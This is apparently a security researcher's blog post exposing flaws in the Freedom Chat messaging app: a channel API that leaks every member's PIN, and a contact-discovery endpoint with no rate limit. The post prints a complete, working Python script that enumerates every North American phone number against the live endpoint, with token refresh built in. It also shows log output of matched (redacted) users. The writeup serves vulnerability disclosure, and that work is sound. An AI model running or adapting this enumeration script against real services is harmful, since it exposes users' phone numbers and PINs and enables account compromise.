Not one to give up after a setback, Converso CEO Tanner Haas took a break from self-publishing books on how to achieve and receive anything you want to regroup and relaunch, as well as to bless the world with a lessons learned blog post describing his decision to rebrand after realizing that “privacy concerns were primarily coming from conservative circles,” and imparting nuggets of wisdom such as “accept criticism and get better: don’t complain” and “ensure the product has been thoroughly tested and is ready for prime-time.” Presumably he hadn’t learned the first one yet when he responded to crnković’s responsible disclosure with vague legal threats and accusations of being a Signal shill. Let’s see how the second is going.
As usual, I start out by downloading the app from Google Play and running it while monitoring traffic with HTTP Toolkit. I quickly ran into Freedom Chat’s first security feature: as detailed on their website, the app “prevent[s] screenshots and screen recordings entirely with built-in screenshot protection,” perhaps to accomodate conservatives’ complicated relationship with screenshots. Screenshots aren’t really crucial to anything being discussed here, but I like to provide only the best blog posts to my tens of readers, so let’s hook the app with Frida and disable the FLAG_SECURE attribute. With that out of the way, the signup process works as expected for an instant messaging app - we type in a phone number, get texted a 2FA code, and enter it to create an account. We’re asked whether we want to create a PIN, which is apparently optional to log in on my own phone and required if we want to restore our account on another device, then get to the main UI of the app. There are two main features here: a Chat pane where we can start chats with contacts, and a Channels pane where we can subscribe to user-run microblogging channels à la Telegram.

Let’s start out with the basics and have a conversation with a second account. Sending a text message triggers the following exchange:
/message request
METHOD: POST
URL: https://eagle.freedomchat.com/message
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for us at login>
Connection: keep-alive
{
"sendId": "bdbf9ef7-aaca-4a57-8c4e-5fe978205299",
"type": "text",
"files": [],
"isEncrypted": true,
"createdAt": "2025-11-20T21:12:09.180Z",
"chatId": "64b9a972-4232-4026-a037-8848909b264d",
"content": "{\"sessionId\":\"5900c62e-8819-43d7-a6fe-a1745c425bf3\",\"data\":\"5wNaCjU3Y0XOvwA9eCuejjJrxRGFNhr+dlnkmeWQcqpxPyfeueVlfVUihifjG33q5HrMMT4ex85c9W4iZcNziXPvVtrs1VrEW2ZWonccOdmXB91ONgLuG0fRjGoc3IFN\"}"
}
STATUS: 201 CREATED
{
"message": {
"id": "f1e3a08a-fc8f-4268-b6a8-36ab6abc0464",
"content": "{\"sessionId\":\"5900c62e-8819-43d7-a6fe-a1745c425bf3\",\"data\":\"5wNaCjU3Y0XOvwA9eCuejjJrxRGFNhr+dlnkmeWQcqpxPyfeueVlfVUihifjG33q5HrMMT4ex85c9W4iZcNziXPvVtrs1VrEW2ZWonccOdmXB91ONgLuG0fRjGoc3IFN\"}",
"user": {
"uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
"userName": null,
"phoneNumber": "+13322699625",
"isBlocked": false,
"sealdKey": "180cc149-5bc6-406b-b32e-4afaadff2f47",
"keyChangedAt": "2025-11-20T21:06:31.308Z",
"createdAt": "2025-11-20T21:06:07.041Z",
"updatedAt": "2025-11-20T21:06:31.311Z"
},
"role": "user",
"type": "text",
"sendId": "bdbf9ef7-aaca-4a57-8c4e-5fe978205299",
"chatId": "64b9a972-4232-4026-a037-8848909b264d",
"channelId": null,
"erased": false,
"isEdited": false,
"isEncrypted": true,
"parent": null,
"selfDestructInSec": null,
"destructAt": null,
"createdAt": "2025-11-20T21:12:09.180Z",
"updatedAt": "2025-11-20T21:12:12.638Z",
"updateAction": "insert",
"updateItem": "message",
"updateValue": null,
"updateUserId": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
"statuses": [
{
"id": "4a1217f4-ab16-4f63-964d-4afd5cdd6b86",
"recipient": {
"uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
"userName": null,
"phoneNumber": "+13322699625",
"isBlocked": false,
"sealdKey": "180cc149-5bc6-406b-b32e-4afaadff2f47",
"keyChangedAt": "2025-11-20T21:06:31.308Z",
"createdAt": "2025-11-20T21:06:07.041Z",
"updatedAt": "2025-11-20T21:06:31.311Z"
},
"recipientId": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
"delivered": false,
"deliveredAt": null,
"read": false,
"readAt": null
},
{
"id": "3e6a8549-c2f7-41ca-8acc-3baa7fc51457",
"recipient": {
"uid": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
"userName": null,
"phoneNumber": "+13095416781",
"isBlocked": false,
"sealdKey": "c1d370b9-2323-456d-b4ce-eac3e30014e2",
"keyChangedAt": "2025-11-20T19:59:10.095Z",
"createdAt": "2025-11-20T19:58:00.462Z",
"updatedAt": "2025-11-20T20:59:02.686Z"
},
"recipientId": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
"delivered": true,
"deliveredAt": null,
"read": false,
"readAt": null
}
]
},
"assets": []
}
This is the encrypted and Base64-encoded text we sent, along with some metadata for things like read receipts and editing and the identifiers needed for decryption (they’re using the same Seald backend that Converso had, without uploading everything to Firebase this time). Sending a photo and a voice message yields similar results. While verifying that they’re using Seald properly this time would require painstakingly decompiling and reverse engineering React Native’s Hermes VM bytecode, at a high level this seems fine. Let’s move on to the Channels feature. When we open the tab, we see that we’ve already been added to a Freedom Chat channel, which mostly posts about updates to the app and related media coverage.

We’re also suggested a handful of other channels to join, including that of Tanner Haas and some people who are apparently conservative influencers. Tanner mostly seems to use his to post fascinating political takes:

When we open a channel, the following request and massive response happen:
/channel request
METHOD: POST
URL: https://eagle.freedomchat.com/channel?take=1000&skip=0×tamp=1764377818411
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for me at login>
Connection: keep-alive
STATUS: 200 OK
{
"data": [
{
"id": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
"name": "Freedom Chat",
"verified": true,
"recommended": true,
"forTest": false,
"description": "The official channel of Freedom Chat Inc. 🦅🇺🇸",
"isScreenshotProtected": true,
"isMediaSaveDisabled": false,
"messageSelfDestruct": null,
"createdAt": "2025-06-06T22:33:58.609Z",
"updatedAt": "2025-11-11T15:05:56.565Z",
"coverImage": {
"id": "3c52569b-d9ba-4695-9469-c39c0bd6a95b",
"key": "AC2E2C9C-B23D-4EEC-8F35-39ED2E3D002C-47bce191-d213-4c9f-8c09-c8095935632d.png",
"mimeType": "image/png",
"url": "https://fc-media.object.us-east-1.rumble.cloud/AC2E2C9C-B23D-4EEC-8F35-39ED2E3D002C-47bce191-d213-4c9f-8c09-c8095935632d.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=5rT0Vph76SOrvs39XKPfHBrwaFFZ2daB%2F20251128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20251128T161557Z&X-Amz-Expires=86400&X-Amz-Signature=3f976f4cf09177c28f1060203e3ac6bcdf87932badc5c601cb39b428a1e96a9d&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject",
"createdAt": "2025-06-06T22:33:58.605Z",
"updatedAt": "2025-11-28T16:15:57.150Z"
},
"creator": {
"uid": "fce31a02-17b6-4298-9be4-<redacted for publication>",
"userName": "freedomchat",
"pin": "<six digit code redacted for publication>",
"pinBackoffDate": "2025-11-07T23:37:09.265Z",
"pinBackoffNb": 0,
"isBlocked": false,
"sealdKey": "956acbdf-925f-47b6-8323-<redacted for publication>",
"keyChangedAt": "2025-09-21T14:48:08.778Z",
"createdAt": "2025-06-06T15:28:50.364Z",
"updatedAt": "2025-11-20T17:52:16.117Z"
},
"members": [
{
"channelId": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
"userUid": "9646aae0-956b-4252-993e-<redacted for publication>",
"isMuted": false,
"isScreenshotProtected": true,
"isMediaSaveDisabled": false,
"isDeleted": false,
"isAdmin": false,
"createdAt": "2025-08-22T20:19:43.835Z",
"updatedAt": "2025-08-22T20:19:43.835Z",
"user": {
"uid": "9646aae0-956b-4252-993e-<redacted for publication>",
"userName": null,
"pin": "<six digit code redacted for publication>",
"pinBackoffDate": null,
"pinBackoffNb": 0,
"isBlocked": false,
"sealdKey": "e2ce450b-9701-4750-ad95-<redacted for publication>",
"keyChangedAt": "2025-10-13T17:54:16.222Z",
"createdAt": "2025-06-07T13:32:09.371Z",
"updatedAt": "2025-10-13T17:54:37.187Z"
}
},
{
"channelId": "b0fcab24-36ed-4dae-8f6b-07c5d96606ae",
"userUid": "8e4291dd-be77-43df-8227-<redacted for publication>",
"isMuted": false,
"isScreenshotProtected": true,
"isMediaSaveDisabled": false,
"isDeleted": false,
"isAdmin": false,
"createdAt": "2025-09-24T05:51:43.793Z",
"updatedAt": "2025-09-24T05:51:43.793Z",
"user": {
"uid": "8e4291dd-be77-43df-8227-<redacted for publication>",
"userName": null,
"pin": "<six digit code redacted for publication>",
"pinBackoffDate": null,
"pinBackoffNb": 0,
"isBlocked": false,
"sealdKey": "eecd08da-e119-49e5-9f88-<redacted for publication>",
"keyChangedAt": "2025-09-24T05:50:02.186Z",
"createdAt": "2025-09-24T05:49:14.769Z",
"updatedAt": "2025-09-24T05:50:02.185Z"
}
},
...,
]
]
}
The members array has 1519 entries in that format, apparently one for each member of the channel. What’s going on in that user object? The pin field seems suspiciously related to the PIN we were asked to input after creating our account… To confirm, we can sort the array by createdAt and find that the most recent entry does indeed have the PIN we just set when making our account. So anyone who’s in a channel (i.e. anyone who hasn’t left the default Freedom Chat channel) has their PIN broadcast to every other user! There’s no direct link between PINs and phone numbers here, but this is still not great.
If we scroll back a bit in the Freedom Chat channel, we see this message dunking on WhatsApp:

The vulnerability they’re talking about was presented in a paper by researchers at the University of Vienna. The paper is interesting and you should go read it, but to summarize, WhatsApp failed to rate limit the API that eats up every phone number in your contacts and checks whether they also use WhatsApp or not. Researchers were thus able to test nearly every possible phone number in the world, and end up with a dump of every WhatsApp user’s phone number, along with some other metadata. It’s interesting that Freedom Chat isn’t vulnerable to this, because they have the same contact discovery feature WhatsApp does, with the app offering you to either start a chat or invite each of your contacts depending on whether they already have an account:

Let’s find out for ourselves. When we open this contacts page, the following request-response happens:
/user/numbers request
METHOD: POST
URL: https://eagle.freedomchat.com/user/numbers
User-Agent: okhttp/4.12.0
Accept: application/json, text/plain, */*
Accept-Encoding: gzip
Content-Type: application/json
Authorization: Bearer <JWT that was generated for me at login>
Connection: keep-alive
{
"numbers": [
"+13322699625",
"+13095416781",
"+16042771111"
]
}
STATUS: 201 CREATED
[
{
"uid": "0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6",
"phoneNumber": "+13322699625",
"sealdKey": "1eea159c-620f-4561-95e8-2918e7d891fc"
},
{
"uid": "5414cf2c-3f03-46b2-aa16-9e322359cafb",
"phoneNumber": "+13095416781",
"sealdKey": "c1d370b9-2323-456d-b4ce-eac3e30014e2"
}
]
The first two numbers in the request are the two we used to register Freedom Chat accounts. The third is a number we didn’t register, as a control. A couple things are interesting here. Most obviously, this is exactly the WhatsApp API the Vienna researchers exploited, and will contain the same vulnerability if not rate limited. This endpoint also provides a linkage between phone numbers and UIDs - if we could run every registered phone number through it, we could get each number’s UID and match it to the UIDs in the Channels response to get that number’s PIN, entirely defeating the PIN mechanism. Now we just need to test whether it’s rate limited
Freedom Chat enumeration script
import itertools
import pandas as pd
import json
import requests
import datetime
import random
from time import sleep
area_codes = [
201, 202, 203, 205, 206, 207, 208, 209, 210, 212, 213, 214, 215, 216, 217, 218, 219, 224, 225, 228, 229, 231, 234, 239, 240, 242, 248, 251, 252, 253, 254, 256, 260, 262, 267, 269, 270, 276, 281, 283, 301, 302, 303, 304, 305, 307, 308, 309, 310, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 323, 325, 327, 330, 331, 334, 336, 337, 339, 340, 346, 347, 351, 352, 360, 361, 386, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 412, 413, 414, 415, 417, 418, 419, 423, 424, 425, 430, 432, 434, 435, 440, 443, 458, 469, 470, 475, 478, 479, 480, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 512, 513, 514, 515, 516, 517, 518, 520, 530, 540, 541, 551, 559, 561, 562, 563, 564, 567, 570, 571, 573, 574, 575, 580, 585, 586, 601, 602, 603, 605, 606, 607, 608, 609, 610, 612, 614, 615, 616, 617, 618, 619, 620, 630, 631, 636, 641, 646, 650, 651, 657, 660, 661, 662, 667, 669, 678, 681, 682, 701, 702, 703, 704, 705, 706, 707, 708, 712, 713, 714, 715, 716, 717, 718, 719, 720, 724, 727, 731, 732, 734, 740, 747, 754, 757, 760, 762, 763, 765, 770, 772, 773, 774, 775, 781, 784, 785, 786, 787, 801, 802, 803, 804, 805, 806, 808, 810, 812, 813, 814, 815, 816, 817, 818, 828, 830, 831, 832, 843, 845, 847, 848, 850, 856, 857, 858, 859, 860, 862, 863, 864, 865, 870, 872, 873, 876, 877, 878, 901, 902, 903, 904, 905, 906, 907, 908, 909, 910, 912, 913, 914, 915, 916, 917, 918, 919, 920, 925, 928, 931, 937, 940, 941, 947, 951, 952, 954, 956, 970, 971, 972, 973, 975, 978, 979, 980, 985, 989
]
digits = ("0", "1", "2", "3", "4", "5", "6", "7","8", "9")
orig_combinations = pd.Series(["".join(x) for x in itertools.product(digits, repeat=7)])
orig_combinations = orig_combinations[~orig_combinations.str.startswith("0") & ~orig_combinations.str.startswith("1")]
with open("freedom_enum_log.txt", "w") as logfile:
random.shuffle(area_codes)
for ac in area_codes:
logfile.write(f"Starting area code {ac}\n")
combinations = ["+1" + str(ac) + ''.join(c) for c in list(orig_combinations)]
url = "https://eagle.freedomchat.com/user/numbers"
authToken = "initial auth token"
refreshToken = "initial refresh token"
for i in range(0, 8000000, 40000):
tranche = combinations[i:i+40000]
tranche.append("+13322699625")
payload = { "numbers": tranche }
headers = {
"accept": "application/json, text/plain, */*",
"authorization": f"Bearer {authToken}",
"content-type": "application/json",
"host": "eagle.freedomchat.com",
"connection": "Keep-Alive",
"accept-encoding": "gzip",
"user-agent": "okhttp/4.12.0"
}
response = requests.post(url, json=payload, headers=headers)
if "Unauthorized" in response.text:
refreshResponse = requests.post("https://eagle.freedomchat.com//auth/refresh", json={"refreshToken": refreshToken})
authToken = refreshResponse.json()["accessToken"]
refreshToken = refreshResponse.json()["refreshToken"]
response = requests.post(url, json=payload, headers=headers)
if response.text.count("uid") != 1:
logfile.write(response.text + "\n")
if response.elapsed > datetime.timedelta(seconds=3):
logfile.write(f"Getting slow! {response.elapsed}\n")
logfile.flush()
logfile.write(f"Done area code {ac}\n")
combinations = []
This is pretty self-explanatory. We generate every valid 7-digit North American phone number, then for every area code, send every number in batches of 40000, plus a number we registered so we can check for false empty responses. We log responses that don’t contain the string “uid” exactly once; if a response contains it 0 times it has failed to produce our registered number and is thus faulty somehow, if a response contains it 2+ times we have found another number. We also reauthenticate as needed and note if we start to slow down the server at all. Yes, there are a million ways to make this concurrent and faster, but we’re trying to enumerate not DDOS their server, and at ~1.5 seconds average RTT we should be able to test every American phone number in about a day.
The log file starts to fill up with entries within a few minutes:
Starting area code 305
[{"uid":"08171874-4b15-47d8-aa78-<redacted for publication>","phoneNumber":"+13052<redacted for publication>","sealdKey":"941bb3f1-a7e1-4565-a302-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"abde2596-80df-4e87-993d-<redacted for publication>","phoneNumber":"+13053<redacted for publication>","sealdKey":"643c55e4-badd-4932-9051-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"64ef67ef-d4b2-4545-9592-<redacted for publication>","phoneNumber":"+13054<redacted for publication>","sealdKey":"38d04de8-752f-4214-b8be-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
[{"uid":"b0366897-bfeb-474d-9c15-<redacted for publication>","phoneNumber":"+13057<redacted for publication>","sealdKey":"06dfc59c-2318-4419-93d1-<redacted for publication>"},{"uid":"0a0d27ff-9c3e-46f6-a3e3-a22ebaedfac6","phoneNumber":"+13322699625","sealdKey":"c0b5fb1c-c1ea-4177-872d-159ff524328b"}]
Time to go do something else for a while. Just over 27 hours and one ill-fated attempt at early season ski touring later, the script has finished happily, the logfile is full of entries, and no request has failed or taken longer than 3 seconds. So much for rate limiting. We’ve leaked every Freedom Chat user’s phone number, and unless they happened to leave the default channel, we’ve also matched their phone number to their PIN, rendering the entire PIN feature pointless.